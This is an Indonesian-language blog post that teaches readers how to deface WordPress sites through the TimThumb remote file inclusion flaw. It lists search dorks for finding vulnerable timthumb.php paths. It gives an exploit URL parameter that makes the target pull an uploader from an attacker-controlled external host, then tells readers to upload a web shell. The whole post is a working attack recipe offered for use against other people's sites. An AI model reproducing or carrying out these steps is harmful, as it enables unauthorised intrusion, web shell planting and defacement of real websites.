Deface Poc Timthumb
Hey yo wats app gengs :v, kali ini w akan memberikan tutorial Deface dengan metode Timthumb.
Sebenarnya nih poc dah lama, tapi lumayan lah banyak yang vuln :v wkwkwk :V .
ok langsung saja :
Dork :
wp-content/plugins/wp-pagenavi/timthumb.php
wp-content/plugins/wp-pagenavi/inc/timthumb.php
wp-content/plugins/wp-pagenavi/functions/timthumb.php
wp-content/plugins/wp-pagenavi/scripts/timthumb.php
wp-content/themes/canvas/timthumb.php
wp-content/themes/TheStyle/timthumb.php
Untuk All dork nya bisa KLIK DISINI
Exploit :
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php
(btw ini saia pakai cpanel nya Speciment, tq Speciment :*)
Ok langsung saja ke tutorial nya
1. Dorking dulu dengan dork diatas.. oce
2. kalo vuln maka akan seperti ini
3. Lalu kasih exploit di belakang url nya
site.com/timthumb.php
jadi
site.com/timthumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php
Maka sudah terupload uploader nya..
4. Tinggal kita akses uploader nya tadi
akses?? sudah tertera di disitu
itu sudah muncul akses nya kan? sekarang tinggalkita eksekusi...
Beikut Bentuk dari uploader nya..
5. Tinggal upload deh shell kalian..
Sekian Tutorial kali ini, bila ada yang kurang jelas bisa komentar, sekian dan terima gaji
Comments
Post a Comment